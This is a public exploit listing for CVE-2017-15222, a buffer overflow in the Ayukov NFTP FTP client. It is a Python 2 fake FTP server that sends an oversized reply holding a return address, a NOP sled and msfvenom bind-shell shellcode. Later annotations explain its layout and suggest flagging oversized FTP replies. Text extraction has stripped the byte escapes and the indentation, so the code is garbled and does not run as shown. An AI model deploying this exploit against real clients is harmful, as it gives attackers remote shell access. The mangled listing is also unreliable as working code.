# Exploit Title: Ayukov NFTP FTP Client 2.0 - Buffer Overflow
# Date: 2018-12-29
# Exploit Author: Uday Mittal
# Vendor Homepage: http://www.ayukov.com/nftp/
# Software Link: ftp://ftp.ayukov.com/pub/src/nftp-1.72.zip
# Version : below 2.0
# Tested on: Microsoft Windows XP SP3
# CVE: CVE-2017-15222

# EIP Location: 4116
# Buffer starts from : 4121
# 0x7e45b310 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
# badchars: 'x00x0Ax0Dx40'
# Shellcode: msfvenom -p windows/shell_bind_tcp RHOST=192.168.43.72 LPORT=4444 -b 'x00x0Ax0D' -f python

import socket

# What follows is a Python 2 proof-of-concept harness (note the statement
# form `print conn.recv(1024)`): it runs as a fake FTP *server* and waits for
# the vulnerable client to connect, so this is a client-side bug triggered by
# an oversized server reply. As reproduced here the text has been mangled by
# extraction: the backslashes of the `\x..` escapes inside the string
# literals are gone (the "x.." runs are plain ASCII, not bytes) and the
# indentation of the try/while bodies is lost, so the file does not parse
# as-is. It is documented, not repaired, below.

# Address and port the fake server listens on (used by s.bind below).
IP = '192.168.43.28'
port = 21

# Payload produced by the msfvenom command quoted in the header. With the
# escapes stripped these lines are not the intended bytes; left unchanged.
buf = ""
buf += "xbbx04x8bxfcxf1xd9xc4xd9x74x24xf4x5ax29"
buf += "xc9xb1x53x83xeaxfcx31x5ax0ex03x5ex85x1e"
buf += "x04xa2x71x5cxe7x5ax82x01x61xbfxb3x01x15"
buf += "xb4xe4xb1x5dx98x08x39x33x08x9ax4fx9cx3f"
buf += "x2bxe5xfax0exacx56x3ex11x2exa5x13xf1x0f"
buf += "x66x66xf0x48x9bx8bxa0x01xd7x3ex54x25xad"
buf += "x82xdfx75x23x83x3cxcdx42xa2x93x45x1dx64"
buf += "x12x89x15x2dx0cxcex10xe7xa7x24xeexf6x61"
buf += "x75x0fx54x4cxb9xe2xa4x89x7ex1dxd3xe3x7c"
buf += "xa0xe4x30xfex7ex60xa2x58xf4xd2x0ex58xd9"
buf += "x85xc5x56x96xc2x81x7ax29x06xbax87xa2xa9"
buf += "x6cx0exf0x8dxa8x4axa2xacxe9x36x05xd0xe9"
buf += "x98xfax74x62x34xeex04x29x51xc3x24xd1xa1"
buf += "x4bx3exa2x93xd4x94x2cx98x9dx32xabxdfxb7"
buf += "x83x23x1ex38xf4x6axe5x6cxa4x04xccx0cx2f"
buf += "xd4xf1xd8xdaxdcx54xb3xf8x21x26x63xbdx89"
buf += "xcfx69x32xf6xf0x91x98x9fx99x6fx23x8ex05"
buf += "xf9xc5xdaxa5xafx5ex72x04x94x56xe5x77xfe"
buf += "xcex81x30xe8xc9xaexc0x3ex7ex38x4bx2dxba"
buf += "x59x4cx78xeax0exdbxf6x7bx7dx7dx06x56x15"
buf += "x1ex95x3dxe5x69x86xe9xb2x3ex78xe0x56xd3"
buf += "x23x5ax44x2exb5xa5xccxf5x06x2bxcdx78x32"
buf += "x0fxddx44xbbx0bx89x18xeaxc5x67xdfx44xa4"
buf += "xd1x89x3bx6exb5x4cx70xb1xc3x50x5dx47x2b"
buf += "xe0x08x1ex54xcdxdcx96x2dx33x7dx58xe4xf7"
buf += "x8dx13xa4x5ex06xfax3dxe3x4bxfdxe8x20x72"
buf += "x7ex18xd9x81x9ex69xdcxcex18x82xacx5fxcd"
buf += "xa4x03x5fxc4"

# The reply that overflows the client, laid out as the header's offset notes
# describe: filler up to the overwritten return address, the USER32.dll
# address from the header note, a run of x90 (NOP) bytes, the payload, and
# fixed trailing padding. From a defender's view the signal is size: a single
# FTP reply line well over 14 KB, far beyond anything normal RFC 959 traffic
# produces, which is easy to alert on or to cap at the client.
evil = "A"*4116 + "x10xb3x45x7e" + "x90"*100 + buf + "D"*10425

# Listener setup. NOTE(review): the bare except only prints on failure and
# never exits, so a failed socket()/bind()/listen() still falls through into
# the accept loop below, where `s` is unbound or not listening.
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((IP, port))
s.listen(20)
print("[i] FTP Server started on port: "+str(port)+" ")
except:
print("[!] Failed to bind the server to port: "+str(port)+" ")

# Accept loop: one connection at a time, never closed. The replies are sent
# unconditionally -- whatever the client sends is only printed, never
# checked. The lone ' ' appended to each reply presumably stood for a
# '\r\n' line terminator that extraction stripped -- TODO confirm against
# the original listing.
while True:
conn, addr = s.accept()
conn.send('220 Welcome!' + ' ')
print conn.recv(1024)
conn.send('331 OK. ')
print conn.recv(1024)
conn.send('230 OK. ')
print conn.recv(1024)
# The oversized reply goes out as the answer to the client's third command;
# which command that is depends on the client's own sequence and is not
# checked here.
conn.send(evil + ' ')
print conn.recv(1024)
conn.send('257' + ' ')